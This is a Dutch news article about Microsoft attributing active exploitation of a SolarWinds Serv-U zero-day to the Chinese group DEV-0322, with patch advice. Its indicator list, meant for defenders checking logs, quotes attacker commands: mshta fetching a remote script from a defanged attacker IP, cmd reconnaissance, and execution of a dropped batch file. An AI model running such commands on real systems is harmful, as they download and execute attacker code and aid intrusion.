Overslaan en naar de inhoud gaan

Microsoft: Chinese hackers zitten achter nieuwe SolarWinds-aanval

De hackers die het nieuw ontdekte SolarWinds-gat misbruiken, behoren naar alle waarschijnlijkheid tot een Chinese hackersgroep. Dat stelt Microsoft op basis van eigen onderzoek. Onderzoekers van het bedrijf ontdekten het nieuwe probleem in de software van SolarWinds en maakten daar melding van. Inmiddels is een patch beschikbaar.
hack
© Shutterstock.com
Shutterstock.com

SolarWinds bracht afgelopen maandag een patch uit voor een nieuw gevonden gat in zijn Serv-U Managed File Transfer- en Serv-U Secure FTP-producten. De kwetsbaarheid is op afstand te misbruiken en laat aanvallers met diepgaande rechten eigen code uitvoeren op het onderliggende systeem. Volgens SolarWinds kan een inbreker zo programma's installeren, data bekijken, veranderen en wissen, en programma's draaien. Het gat wordt al actief misbruikt.

De zeroday werd ontdekt door beveiligingsonderzoekers van Microsoft, dat nu meer informatie geeft over het probleem. Microsoft zegt er redelijk zeker van te zijn dat de groep die het gat misbruikt onderdeel uitmaakt van de hackergroep 'DEV-0322'. DEV staat voor "development group", een term die wordt gebruikt voor nog niet-geïdentificeerde aanvalsgroepen. Iedere DEV-groep krijgt zijn eigen unieke nummer, zodat deze gevolgd kan worden.

Volgens Microsoft komt DEV-0322 uit China en gebruiken ze commerciële VPN-oplossingen en gecompromitteerde routers van consumenten bij hun aanvallen. De groep heeft volgens Microsoft tot nu toe de Amerikaanse Defensie-industrie en softwarebedrijven als doelwit gehad. 

Advies: onderzoek logs

Microsoft beschrijft verder hoe gebruikers kunnen zien of er een aanvalspoging is gedaan. Daarvoor moeten gebruikers het Serv-U-logbestand DebugSocketLog.txt bekijken en zoeken naar een melding als "C0000005; CSUSSHSocket::ProcessReceive". Deze melding kan aanduiden dat er een aanvalspoging is gedaan, maar kan ook om andere redenen opduiken. Mocht de melding gevonden worden, dan adviseert Microsoft echter sowieso om de logs verder te onderzoeken op signalen van misbruik. Het gaat om de volgende indicatoren:

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp
  • The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

SolarWinds heeft maandag al een patch (HF2) uitgebracht voor de kwetsbaarheid. Die hotfix is beschikbaar in het klantportaal voor organisaties die een onderhoudscontract bij SolarWinds hebben. Wie dat niet heeft, krijgt het advies om een ticket in te dienen bij de klantenservice. Het dringende advies is om de hotfix meteen te installeren. 

Reacties

Om een reactie achter te laten is een account vereist.

Inloggen Word abonnee

Bevestig jouw e-mailadres

We hebben de bevestigingsmail naar %email% gestuurd.

Geen bevestigingsmail ontvangen? Controleer je spam folder. Niet in de spam, klik dan hier om een account aan te maken.

Er is iets mis gegaan

Helaas konden we op dit moment geen account voor je aanmaken. Probeer het later nog eens.

Maak een gratis account aan en geniet van alle voordelen:

Heb je al een account? Log in

Maak een gratis account aan en geniet van alle voordelen:

Heb je al een account? Log in